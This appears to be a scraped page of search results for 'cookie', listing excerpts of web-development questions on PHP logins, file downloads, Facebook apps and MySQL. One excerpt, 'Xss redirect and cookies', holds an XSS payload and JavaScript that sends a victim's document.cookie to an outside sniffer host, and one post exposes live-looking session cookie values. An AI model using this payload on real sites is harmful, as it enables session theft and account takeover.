Search Results

Search found 1701 results on 69 pages for 'cookie'.

Page 52/69 | < Previous Page | 48 49 50 51 52 53 54 55 56 57 58 59  | Next Page >

  • How to implement a good system for login/out into a webapp

    - by Brandon Wang
    I am one of the developers at PassPad, a secure password generator and username storage system. We're still working on it, but I have a few questions on the best way to implement a secure login/out system. Right now, what we plan on doing is to have the login system save a cookie with the username and a session key, and that's all that serves as authentication. The server verifies the two to match. Upon login/out a new key is created. This is a security-related webapp and while we don't actually store any information that might make the user queasy, because it is security-oriented it makes it a necessity for us to at least appear secure in a way that the user would be happy with. Is there a better way to implement a login/out system in PHP? Preferably it won't take too much coding time or server resources. Is there anything else I need to implement, like brute-force protection, etc? How would I go about that?

    Read the article

  • PHP File Serving Script: Unreliable Downloads?

    - by JGB146
    This post started as a question on ServerFault ( http://serverfault.com/questions/131156/user-receiving-partial-downloads ) but I determined that our php script was the culprit. So I'm issuing an updated question here about what I believe is the actual issue. I am using a php script to verify permissions and then serve up a file for users of my website to download. Most of the time, this works, but recently one user has been seeing problems with larger downloads. He is only getting ~80% of downloads for files that are 100MB in size. Also, all downloads from this script fail to report a filesize. Further, tests revealed that the same user COULD reliably download each of the failed files if given a direct link (at which point the filesize is reported). Here's the relevant snippet of code that we are using to serve the file: header("Content-type:$contenttype"); $len = filesize($filename); header("Content-Length: $len"); header("Content-Disposition: attachment; filename=".$title.".".$ext); readfile($filename); Note that $contenttype, $filename, $title, and $ext are all set correctly before we get here. These have been triple-checked. None of them are the problem. Also, $len does provide the correct filesize. While researching this issue, I came across this post: http://stackoverflow.com/questions/1334471/content-length-header-always-zero It seems that I am encountering the same issue. When I use the script, I get chunked encoding on the file and no size is set for content-length. I'm hypothesizing that something is going wrong on the large downloads, leading him to get a zero-length chunk before the end of the file. Here's what the headers look like for a direct request: http://www.grinderschool.com/videos/zfff5061b65ae00e8b21/KillsAids021.wmv GET /videos/zfff5061b65ae00e8b21/KillsAids021.wmv HTTP/1.1 Host: www.grinderschool.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.grinderschool.com/phpBB3/viewtopic.php?f=14&p=29468 Cookie: style_cookie=printonly; phpbb3_7c544_u=2; phpbb3_7c544_k=44b832912e5f887d; phpbb3_7c544_sid=e8852df42e08cc1b2250300c2897f78f; __utma=174624884.2719561324781918700.1251850714.1270986325.1270989003.575; __utmz=174624884.1264524375.411.12.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=low%20stakes%20poker%20videos; phpbb3_cmviy_k=; phpbb3_cmviy_u=2; phpbb3_cmviy_sid=d8df5c0943863004ca40ef9c392d371d; __utmb=174624884.4.10.1270989003; __utmc=174624884 Pragma: no-cache Cache-Control: no-cache HTTP/1.1 200 OK Date: Sun, 11 Apr 2010 12:57:41 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2 mod_auth_passthrough/2.1 FrontPage/5.0.2.2635 Last-Modified: Sun, 04 Apr 2010 12:51:06 GMT Etag: "eb42d6-7d9b843-48368aa6dc280" Accept-Ranges: bytes Content-Length: 131708995 Keep-Alive: timeout=10, max=30 Connection: Keep-Alive Content-Type: video/x-ms-wmv And here's what they look like for the request answered by my script: http://www.grinderschool.com/download_video_test.php?t=KillsAids021&format=wmv GET /download_video_test.php?t=KillsAids021&format=wmv HTTP/1.1 Host: www.grinderschool.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: style_cookie=printonly; phpbb3_7c544_u=2; phpbb3_7c544_k=44b832912e5f887d; phpbb3_7c544_sid=e8852df42e08cc1b2250300c2897f78f; __utma=174624884.2719561324781918700.1251850714.1270986325.1270989003.575; __utmz=174624884.1264524375.411.12.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=low%20stakes%20poker%20videos; phpbb3_cmviy_k=; phpbb3_cmviy_u=2; phpbb3_cmviy_sid=d8df5c0943863004ca40ef9c392d371d; __utmb=174624884.4.10.1270989003; __utmc=174624884 HTTP/1.1 200 OK Date: Sun, 11 Apr 2010 12:58:02 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2 mod_auth_passthrough/2.1 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.11 Content-Disposition: attachment; filename=KillsAids021.wmv Vary: Accept-Encoding Content-Encoding: gzip Keep-Alive: timeout=10, max=30 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: video/x-ms-wmv So the question is...what can I do to make downloads from the script work properly? Again, for 99% of users, it works as is (though I find it annoying now that no filesize is reported and thus that no time estimate can be computed about the download).

    Read the article

  • Codeigniter Form validation problem

    - by ben robinson
    Please please please can someone help me $this-load-library('form_validation'); $this-load-helper('cookie'); $data = array(); if($_POST) { // Set validation rules including additional validation for uniqueness $this-form_validation-set_rules('yourname', 'Your Name', 'trim|required'); $this-form_validation-set_rules('youremail', 'Your Email', 'trim|required|valid_email'); $this-form_validation-set_rules('friendname', 'Friends Name', 'trim|required'); $this-form_validation-set_rules('friendemail', 'Friends Email', 'trim|required|valid_email'); // Run the validation and take action if($this-form_validation-run()) { echo 'valid; } } else{ echo 'problem'; } Form validation is coming back with no errors can cany one see why?

    Read the article

  • Handling session between two pages in iframe-based facebook app.

    - by Ray Yun
    I'm a newbie to iframe based facebook application and stuck with session related problems. There are just two pages in my app. First page got many fb_sig_* parameters from facebook platform but when I click a anchor to next page, those fb_sig_* were lost because this is just direct request from end user's browser not from facebook. So I found that http://forum.developers.facebook.com/viewtopic.php?id=52885. It was told that I should not using cookie and always append every fb_sig* to every anchor. This can be the only solution for my problems? Any side effect like session expiry problem?

    Read the article

  • adding DATE_SUB to query to return range of values in mysql

    - by ian
    Here is my original query: $query = mysql_query("SELECT s.*, UNIX_TIMESTAMP(`date`) AS `date`, f.userid as favoritehash FROM songs s LEFT JOIN favorites f ON f.favorite = s.id AND f.userid = '$userhash' ORDER BY s.date DESC"); This returns all the songs in my DB and then joins data from my favorites table so I can display wich items a return visitors has clicked as favorites or not. Visitors are recognized by a unique has storred in a cookie and in the favorites table. I need to alter this query so that I can get just the last months worth of songs. Below is my attempt at adding DATE_SUB to my query: $query = mysql_query("SELECT s.*, UNIX_TIMESTAMP(`date`) AS `date`, f.userid as favoritehash FROM songs s WHERE `date` >= DATE_SUB( NOW( ) , INTERVAL 1 MONTH ) LEFT JOIN favorites f ON f.favorite = s.id AND f.userid = '$userhash' ORDER BY s.date DESC"); Suggestions?

    Read the article

  • How to Get a Webpage's contents without CURL ?

    - by Arsheep
    I need to get webpage's content ,I cant use Curl as it is not enabled.I tried the below code But it is not working. $opts = array( 'http'=>array( 'method'=>"GET", 'header'=>"Accept-language: en\r\n" . "Cookie: foo=bar\r\n" ) ); $context = stream_context_create($opts); $fp = fopen($_GET['url'], 'r', false, $context); if($fp) fpassthru($fp); fclose($fp); exit; The code produce an error Warning: fopen(http://www.google.com/search?&q=site:www.myspace.com+-intitle:MySpaceTV+%22Todd Terje%22) [function.fopen]: failed to open stream: HTTP request failed! HTTP/1.0 400 Bad Request

    Read the article

  • Login time out when calling opening a new window from modal popup (ASP.NET)

    - by Harsh Shah
    I have a weird problem. I have a window, on a button click I open a modal popup (using ModelPopupExtender), that let's you select a few criteria and then click a submit button. On click of submit button, I open a new window (using window.open()) that shows the status of what happened to your submitted request. However, every time this status window is opened, it goes to the login page. I am thinking the modal popup can't pass the authentication cookie to the newly opened window, but I'm not sure. Here's my web.config portion:

    Read the article

  • Detecting if a browser is using Private Browsing mode

    - by Steve
    I'm building an extranet for a company paranoid about security. They want to make sure that (among other things) their users are browsing the site with the Private Browsing mode switched on in their web browser so that no cookies or history is kept. I found only this http://jeremiahgrossman.blogspot.com/2009/03/detecting-private-browsing-mode.html and http://serverfault.com/questions/18966/force-safari-to-operate-in-private-mode-and-detect-that-state-from-a-webserver The ideal solution would use no or minimal javascript. Would attempting to set a unique cookie work for all browsers and platforms? Anyone done this before? thanks!

    Read the article

  • What is the best way to get support from microsoft developers [closed]

    - by Malcolm Frexner
    I have a problem at my production web, that I am not able to solve. I am not able to reproduce the problem in stage or development. It only appears when the website is under heavy load. I think it is solvable if somebody who has a very good understanding of the internals of FormsAuthentication would have a look at it by logging into our system. It should be at least Scottgu! Somebody told me that Microsoft Premier Support is a good choice for this kind of problems. We have no MSDN subscription or other connection to microsoft that enables us to use MPS. Is there a way to get support on a incident base? Are there other ways to get this kind of support? EDIT Here is the problem itself: http://stackoverflow.com/questions/2448720/different-users-get-the-same-cookie-value-in-aspxanonymous

    Read the article

  • How to make .NET WebForm Routing work with Authorization

    - by jakmas
    I have routes that are being registered from the database into an asp.net website (non MVC). The routes register fine, they all work when I am logged in. What I am trying to do is create a landing page based on some route data: Page is [site]/landing/dell The route looks like: "landing/{client}" and it routes to my page Login.aspx, in there I get the client out of the route, then display some custom brand data based on the value. In my web.config, I have my authentication mode set to forms, with my loginUrl = "Login.aspx" When the user does not have the authorization cookie, it redirects the user to: [site]/Login.aspx?ReturnUrl=%2flanding%2fdell instead of keeping the route url, and displaying the correct data. The IIS server actually does not even process the route at all, just sends the user to the Login.aspx page. I have tried several additions to my web.config: etc, and many variations, but nothing seems to work. Ideas anyone? I assume this is a common issue, and it is just not well documented.

    Read the article

  • fb:comments does not showing Log out link

    - by mahfuz05
    fb.comments does not showing Log out link here is my code < fb:comments xid="mahfuz" canpost="true" candelete="false" > < /fb:comments> here is JS SDK code <div id="fb-root"></div> <script type="text/javascript"> window.fbAsyncInit = function() { FB.init({appId: 'my app id', status: true, cookie: true, xfbml: true}); }; (function() { var e = document.createElement('script'); e.async = true; e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js'; document.getElementById('fb-root').appendChild(e); }()); </script>

    Read the article

  • When do you trust the data / variables

    - by Wizzard
    We all know that all user data, GET/POST/Cookie etc etc needs to be validated for security. But when do you stop, once it's converted into a local variable? eg if (isValidxxx($_GET['foo']) == false) { throw InvalidArgumentException('Please enter a valid foo!'); } $foo = $_GET['foo']; fooProcessor($foo); function fooProcessor($foo) { if (isValidxxx($foo) == false) { throw Invalid...... } //other stuff } To me thats over the top. But what if you load the value from the database... I hope I make sense :)

    Read the article

  • Xss redirect and cookies

    - by user1824906
    I found Active XSS on one site. I need to steal cookies and after it to make redirect on other site. This site has a non-frame protection I tried to put "><script src='http://site.ru/1.js' /></script>" http://site.ru/1.js contains: img = new Image(); img.src = "http:/sniffer.com/nasdasdnu.gif?"+document.cookie; var URL = "http://images.cards.mail.ru/11bolprivet.jpg" var speed = 100; function reload() { document.location = URL } setTimeout("reload()", speed); But it doesn't work=\ Any help?

    Read the article

  • Publish to Current user's wall using FBJS in FBML application

    - by Damodaran
    Hi I need to publish some message to the current user's wall using FBJS in FBML application. When I use window.fbAsyncInit = function() { FB.init({appId: 'MY_APP_ID', status: true, cookie: true, xfbml: false}); }; i am getting an error :- FB is not defined. and window is not defined. For publishing i am using this code function graphStreamPublish(){ var body = document.getElementById("txtTextToPublish").value; FB.api('/me/feed', 'post', { message: body }, function(response) { if (!response || response.error) { // alert('Error occured'); } else { // alert('Post ID: ' + response.id); } }); } (I cannot use alert in facebook..) Thanks in advance..

    Read the article

  • Which event handler to use to record leaving page - onunload or onbeforeunload?

    - by symcbean
    Hi all, Having not any answers to my previous questions about using javascript to measure page turn times, I'm going to start writing my own code (!). To measure the length of tie it takes, I'm proposing dropping a cookie containing a timestamp when the user browses away from a page, then in a subsequent page, comparing that time with 'now' and sending back a request to a URL which will log the interval. It seems that there are 2 possible handlers I could associate the first block of code with - the onunload() handler or the onbeforeunload()? It's more important that it fail silently on browsers with no/broken support for the handler, than it be portable across every possible browser. Any pointers? Gotchas? TIA C.

    Read the article

  • Bandwidth Limit Php Not working

    - by Saxtor
    Hey How are you doing guys, i am trying to limit bandwidth per users not by ipaddress for some reason my code doesnt work i need some help, what i am trying to do is to limit the download of the user that they would only have 10Gb per day to download however it seems to me that my buffer is not working when i use multiple connections it doesnt work, but when i use one connect it works 80% here is my code can you debug the error for me thanks. /** * @author saxtor if you can improve this code email me [email protected] * @copyright 2010 */ /** * CREATE TABLE IF NOT EXISTS `max_traffic` ( `id` int(255) NOT NULL AUTO_INCREMENT, `limit` int(255) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=0 ; */ //SQL Connection [this is hackable for testing] date_default_timezone_set("America/Guyana"); mysql_connect("localhost", "root", "") or die(mysql_error()); mysql_select_db("Quota") or die(mysql_error()); function quota($id) { $result = mysql_query("SELECT `limit` FROM max_traffic WHERE id='$id' ") or die(error_log(mysql_error()));; $row = mysql_fetch_array($result); return $row[0]; } function update_quota($id,$value) { $result = mysql_query("UPDATE `max_traffic` SET `limit`='$value' WHERE id='$id'") or die(mysql_error()); return $value; } if ( quota(1) != 0) $limit = quota(1); else $limit = 0; $multipart = false; //was a part of the file requested? (partial download) $range = $_SERVER["HTTP_RANGE"]; if ($range) { $cookie .= "\r\nRange: $range"; $multipart = true; header("X-UR-RANGE-Range: $range"); } $url = 'http://127.0.0.1/puppy.iso'; $filename = basename($url); //octet-stream + attachment => client always stores file header('Content-type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.$filename.'"'); //always included so clients know this script supports resuming header("Accept-Ranges: bytes"); $user_agent = ini_get("user_agent"); ini_set("user_agent", $user_agent . "\r\nCookie: enc=$cookie"); $httphandle = fopen($url, "r"); $headers = stream_get_meta_data($httphandle); $size = $headers["wrapper_data"][6]; $sizer = explode(' ',$size); $size = $sizer[1]; //let's check the return header of rapidshare for range / length indicators //we'll just pass these to the client foreach ($headers["wrapper_data"] as $header) { $header = trim($header); if (substr(strtolower($header), 0, strlen("content-range")) == "content-range") { // _insert($range); header($header); header("X-RS-RANGE-" . $header); $multipart = true; //content-range indicates partial download } elseif (substr(strtolower($header), 0, strlen("Content-Length")) == "content-length") { // _insert($range); header($header); header("X-RS-CL-" . $header); } } if ($multipart) header('HTTP/1.1 206 Partial Content'); flush(); $speed = 4128; $packet = 1; //this is private dont touch. $bufsize = 128; //this is private dont touch/ $bandwidth = 0; //this is private dont touch. while (!(connection_aborted() || connection_status() == 1) && $size > 0) { while (!feof($httphandle) && $size > 0) { if ($limit <= 0 ) $size = 0; if ( $size < $bufsize && $size != 0 && $limit != 0) { echo fread($httphandle,$size); $bandwidth += $size; } else { if( $limit != 0) echo fread($httphandle,$bufsize); $bandwidth += $bufsize; } $size -= $bufsize; $limit -= $bufsize; flush(); if ($speed > 0 && ($bandwidth > $speed*$packet*103)) { usleep(100000); $packet++; //update_quota(1,$limit); } error_log(update_quota(1,$limit)); $limit = quota(1); //if( $size <= 0 ) // exit; } fclose($httphandle); } exit;

    Read the article

  • Google Analytics cookies

    - by wokena
    My problem: I erased all cookies from my computer. I sent Post request to the X server log and sent me a "normal" Set-Cookie with its parameters, but then somehow it will send request for Google Analytics (GA), in which the "strange" header (utma, utmac, utmcn ...). This happens when I send request in browser. But when I pass a request to login from my program (I programm in Ruby), so my server will return 302 Found, but no request to the GA sends. And I just need these headers ...

    Read the article

  • Thread Local Memory for Scratch Memory.

    - by Hassan Syed
    I am using Protocol Buffers and OpensSSL to generate, HMACs and then CBC encrypt the two fields to obfuscate the session cookies -- similar Kerberos tokens. Protocol Buffers' API communicates with std::strings and has a buffer caching mechanism; I exploit the caching mechanism, for successive calls in the the same thread, by placing it in thread local memory; additionally the OpenSSL HMAC and EVP CTX's are also placed in the same thread local memory structure ( see this question for some detail on why I use thread local memory and the massive amount of speedup it enables even with a single thread). The generation and deserialization, "my algorithms", of these cookie strings uses intermediary void *s and std::strings and since Protocol Buffers has an internal memory retention mechanism I want these characteristics for "my algorithms". So how do I implement a common scratch memory ? I don't know much about the rdbuf of the std::string object. I would presumeably need to grow it to the lowest common size ever encountered during the execution of "my algorithms". Thoughts ?

    Read the article

  • Where to store things like user pictures using Azure? Blob Storage?

    - by n26
    I have just migrated a project of mine for test cases to Microsoft's azure. But for functionalities similar to an avatar upload I need write access to the files on the harddrive. But this is a cloud, so this is not possible. How can I build such functionalities instead? Should I use the Blob Storage or is there a better solution? Does it make sense to store all website images (f.e. layout images) in the Blob Storage? So I would have a Cookie-free Domain for my static content?

    Read the article

  • Can Tomcat provide seperate (or HTTPS only) sessions for HTTPS requests?

    - by Joe
    I have a web application which contains both secure (SSL) and non-secure pages. A user can login to the site and must appear logged-in in both the SSL and non-SSL areas. (NB. SSL isn't implemented via Tomcat, but via Apache HTTPD servers which sit in front of Tomcat - so Tomcat has no SSL configuration.) The logged-in state is currently maintained via a servlet session (using Tomcat's vanilla session management). The obvious issue with this approach is that the JSESSIONID cookie is transported over both HTTP and HTTPS connections, meaning that it's potentially possible to intercept it and hijack the session. Are there any solutions to this without rolling our own session management (i.e. does Tomcat cater for this situation)? I'm prepared to implement our own session management, but don't want to reinvent something that may already be supported.

    Read the article

  • MVC4 link automatically redirected to default INDEX page/action even if defined action name with controller

    - by Raj Tamakuwala
    i am creating web mobile application in mvc4. My problem is when I click on particular link in my application,it works well, but sometimes it automatically redirected to INDEX page that is set as default page in global.asax as routes.MapRoute( "Default", // Route name "{controller}/{action}/{id}", // URL with parameters new { controller = "Home", action = "Index", id = UrlParameter.Optional } // Parameter defaults ); Now I don't know why its automatically redirected to INDEX page,even if I have already defined controller and action name where it show redirected as, <a href='@(Url.Action( "ActivityWall", "Home"))' > </a> logically it should redirect to "ActivityWall" page,which it does.but sometime only it goes to INDEX page.then when I clear my cookie problem will again solved but after some time it again start redirecting to INDEX page. I also posted question related to cookies issue yesterday,but I think that is nit main issue. can someone help please ?

    Read the article

  • Authkit - deferring action to HTTP response to client application

    - by jon
    Form, Redirect and Forward all send an unauthenticated user to a Form on a login page specified within an Authkit middleware application. I'd like to allow a client application to request a service via XHR and then present a custom 'client side' form if a HTTP status code of 401 is returned, which would then post to Authkit for authentication until valid authentication/authorization occured. Specifically, 1) a jquery $.get request might request a resource. 2) if an Authkit cookie check confirmed previous authorization the content would be returned. 3) if not I would like Authkit to simply return the '401 response' (and not redirect to another page, or return a form template) where a client side exception handler would notify the user and present an authentication form. Can Authkit work like this?

    Read the article

  • I am looking for an actual functional web browser type control for .NET, maybe a C++ LIBRARY#$??$?

    - by Joshua
    I am trying to emulate a web browser in order to execute JavaScript code and then parse the DOM. The System.Windows.Forms.WebBrowser object does not give me the functionality I need. It let's me set the headers, but you cannot set the proxy or clear cookies. Well you can, but it is not ideal and messes with IE's settings. I've been extending the WebBrowser control pinvoking native windows functions so far, but it is really one hack on top of another. I can mess with the proxy and also clear cookies and such, but this control has its issues as I mentioned. I found something called WebKit .NET (http://webkitdotnet.sourceforge.net/), but I don't see support for setting proxies or cookie manipulation. Can someone recommend a c++/.NET/whatever library to do this: Basically tell me what I need to do to get an interface to similar this in .NET: string FetchBrowserParsedHtml(Uri url, WebProxy p, int timeoutSeconds, byte[] headers, byte[] postdata); void ClearCookies(); I am not responsible for my actions.

    Read the article

  • Station ID - more than IP

    - by bensiu
    Hello I am working on internal PHP application where users login only from our network (we are on dedicated IP and application is checking $_SERVER['REMOTE_ADDR'] and if is match our IP go thru if not - Bye However how I can identify from which station user is login ? Using cookie not gonna work - those are windows station working under control MS StedyState and all cookies are deleted every login I don't need nothing fancy like full MAC address just any unique ID (can not be application username - because users use different stations) Any ideas ? Maybe Javascript is able to grab some Unique detail from station's browser (IE 8) and pass this as hidden input? bensiu

    Read the article

  • Running ASP.NET MVC application behind a proxy with different root relative path

    - by Wiebe
    Hi All, I'm having trouble with paths in a ASP.NET MVC application that's running behind a proxy. Our IIS Application root path is for example http://server/MyApp/ meaning that all urls using the application root ("~/",Url.Action("MyAction","MyController")) are resolved to "/MyApp" Now we're running behind a proxy server that forwards all requests, but changes the application root to something like this: "/Secury/Proxy/RubbishUrl/MyApp" Because the original url is only available on the client, I thought of creating a cookie with the path prefix, and insert this before each generated URL on the server. Now the question is, what's the best location in code to modify each URL that's resolved/sent to the client (to resources, controller actions, images etc)? Every path in the application is resolved with the MVC methods (Url.Content, Url.Action etc).

    Read the article

< Previous Page | 48 49 50 51 52 53 54 55 56 57 58 59  | Next Page >